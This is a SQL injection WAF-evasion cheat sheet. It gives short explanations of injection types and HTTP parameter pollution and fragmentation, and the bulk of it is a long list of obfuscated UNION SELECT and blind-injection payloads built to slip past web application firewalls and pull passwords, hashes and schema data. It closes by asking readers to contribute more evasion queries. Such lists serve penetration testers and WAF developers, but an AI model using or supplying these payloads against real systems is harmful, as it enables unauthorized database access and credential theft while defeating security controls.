SQL Injection Bypassing WAF

 Last revision (mm/dd/yy): //

SQLi
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of  injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

SQL Injection – Basic Concepts
There are two types of SQL Injection • SQL Injection into a String/Char parameter Example: SELECT * from table where example = 'Example'

• SQL Injection into a Numeric parameter Example: SELECT * from table where id = 123


 * 1) Exploitation of SQL Injection vulnerabilities is divided into classes according to the DBMS type and injection conditions.

• A vulnerable request can get into Insert, Update, Delete, etc. Example: UPDATE users SET pass = '1' where user = 't1' OR 1=1--'

Example: select * from table where id = 1 AND if((ascii(lower(substring((select user),$i,1))))!=$s,1,benchmark(200000,md5(now)))
 * 1) Blind SQL Injection

Example: (MySQL): SELECT * from table where id = 1 union select 1,2,3 Example: (PostgreSQL): SELECT * from table where id = 1; select 1,2,3
 * 1) Exploitation features for various DBMSs

Bypassing WAF: SQL Injection - Normalization Method Example Number (1) of a vulnerability in the function of request Normalization. • The following request doesn’t allow anyone to conduct an attack /?id=1+union+select+1,2,3/*

• If there is a corresponding vulnerability in the WAF, this request will be successfully performed /?id=1/*union*/union/*select*/select+1,2,3/*

• After being processed by WAF, the request will become index.php?id=1/*uni X on*/union/*sel X ect*/select+1,2,3/*

The given example works in case of cleaning of dangerous traffic, not in case of blocking the entire request or the attack source.

Example Number (2) of a vulnerability in the function of request Normalization. • Similarly, the following request doesn’t allow anyone to conduct an attack /?id=1+union+select+1,2,3/*

• If there is a corresponding vulnerability in the WAF, this request will be successfully performed /?id=1+un/**/ion+sel/**/ect+1,2,3--

• The SQL request will become SELECT * from table where id =1 union select 1,2,3--

Instead of construction /**/, any symbol sequence that WAF cuts off can be used (e.g., #####, %00).

The given example works in case of excessive cleaning of incoming data (replacement of a regular expression with the empty string).

'Using HTTP Parameter Pollution (HPP)'

• The following request doesn’t allow anyone to conduct an attack /?id=1;select+1,2,3+from+users+where+id=1--

• This request will be successfully performed using HPP /?id=1;select+1&id=2,3+from+users+where+id=1--

Successful conduction of an HPP attack bypassing WAF depends on the environment of the application being attacked. OWASP EU09 Luca Carettoni, Stefano diPaola.



Using HTTP Parameter Pollution (HPP)

• Vulnerable code SQL=" select key from table where id= "+Request.QueryString("id")

• This request is successfully performed using the HPP technique /?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

• The SQL request becomes select key from table where id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users

ByPassing WAF: SQL Injection – HPF Using HTTP Parameter Fragmentation (HPF)

• Vulnerable code example Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']); Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit".$_GET['c']);

• The following request doesn’t allow anyone to conduct an attack /?a=1+union+select+1,2/* • These requests may be successfully performed using HPF /?a=1+union/*&b=*/select+1,2 /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users-- • The SQL requests become select * from table where a=1 union/* and b=*/select 1,2 select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--

Bypassing WAF: Blind SQL Injection Using logical requests AND/OR • The following requests allow one to conduct a successful attack for many WAFs /?id=1+OR+0x50=0x50 /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74

Negation and inequality signs (!=, <>, <, >) can be used instead of the equality one – It is amazing, but many WAFs miss it!

It becomes possible to exploit the vulnerability with the method of blind-SQL Injection by replacing SQL functions that get to WAF signatures with their synonyms.  substring -> mid, substr ascii -> hex, bin benchmark -> sleep 

Wide variety of logical requests. and 1 or 1 and 1=1 and 2<3 and 'a'='a' and 'a'<>'b' and char(32)=' ' and 3<=2 and 5<=>4 and 5<=>5 and 5 is null or 5 is not null .... An example of various request notations with the same meaning. select user from mysql.user where user = 'user' OR mid(password,1,1)='*' select user from mysql.user where user = 'user' OR mid(password,1,1)=0x2a select user from mysql.user where user = 'user' OR mid(password,1,1)=unhex('2a') select user from mysql.user where user = 'user' OR mid(password,1,1) regexp '[*]' select user from mysql.user where user = 'user' OR mid(password,1,1) like '*' select user from mysql.user where user = 'user' OR mid(password,1,1) rlike '[*]' select user from mysql.user where user = 'user' OR ord(mid(password,1,1))=42 select user from mysql.user where user = 'user' OR ascii(mid(password,1,1))=42 select user from mysql.user where user = 'user' OR find_in_set('2a',hex(mid(password,1,1)))=1 select user from mysql.user where user = 'user' OR position(0x2a in password)=1 select user from mysql.user where user = 'user' OR locate(0x2a,password)=1 Known:  substring((select 'password'),1,1) = 0x70 substr((select 'password'),1,1) = 0x70 mid((select 'password'),1,1) = 0x70 New: strcmp(left('password',1), 0x69) = 1 strcmp(left('password',1), 0x70) = 0 strcmp(left('password',1), 0x71) = -1 STRCMP(expr1,expr2) returns 0 if the strings are the same, -1 if the first, argument is smaller than the second one, and 1 otherwise. An example of signature bypass. The following request gets to WAF signature /?id=1+union+(select+1,2+from+users) But sometimes, the signatures used can be bypassed /?id=1+union+(select+'xz'from+xxx) /?id=(1)union(select(1),mid(hash,1,32)from(users)) /?id=1+union+(select'1',concat(login,hash)from+users) /?id=(1)union(((((((select(1),hex(hash)from(users)))))))) /?id=(1)or(0x50=0x50) An SQL Injection attack can successfully bypass the WAF, and be conducted in all following cases: • Vulnerabilities in the functions of WAF request normalization. • Application of HPP and HPF techniques. • Bypassing filter rules (signatures). • Vulnerability exploitation by the method of blind SQL Injection. • Attacking the application operating logics (and/or) WAF Bypassing Methods.

/*!%55NiOn*/ /*!%53eLEct*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%53elect*/ +#uNiOn+#sEleCt +#1q%0AuNiOn all#qa%0A#%0AsEleCt /*!%55NiOn*/ /*!%53eLEct*/ /*!u%6eion*/ /*!se%6cect*/ +un/**/ion+se/**/lect uni%0bon+se%0blect %2f**%2funion%2f**%2fselect union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A REVERSE(noinu)+REVERSE(tceles) /*--*/union/*--*/select/*--*/ union (/*!/**/ SeleCT */ 1,2,3) /*!union*/+/*!select*/ union+/*!select*/ /**/union/**/select/**/ /**/uNIon/**/sEleCt/**/ /**//*!union*//**//*!select*//**/ /*!uNIOn*/ /*!SelECt*/ +union+distinct+select+ +union+distinctROW+select+ +UnIOn%0d%0aSeleCt%0d%0a UNION/*&test=1*/SELECT/*&pwn=2*/ un?+un/**/ion+se/**/lect+ +UNunionION+SEselectLECT+ +uni%0bon+se%0blect+ %252f%252a*/union%252f%252a /select%252f%252a*/ /%2A%2A/union/%2A%2A/select/%2A%2A/ %2f**%2funion%2f**%2fselect%2f**%2f union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A /*!UnIoN*/SeLecT+ Union Select by PASS with Url Encoded Method: %55nion(%53elect) union%20distinct%20select union%20%64istinctRO%57%20select union%2053elect %23?%0auion%20?%23?%0aselect %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect %55nion %53eLEct u%6eion se%6cect unio%6e %73elect unio%6e%20%64istinc%74%20%73elect uni%6fn distinct%52OW s%65lect %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7 Illegal mix of Collations ByPass Method : unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))) /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)

union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)?

If you have any SQLi Quires which is Missed above Please help to Contribute Mail Down and be a part of The Popular SQLi Evasion CheatSheet.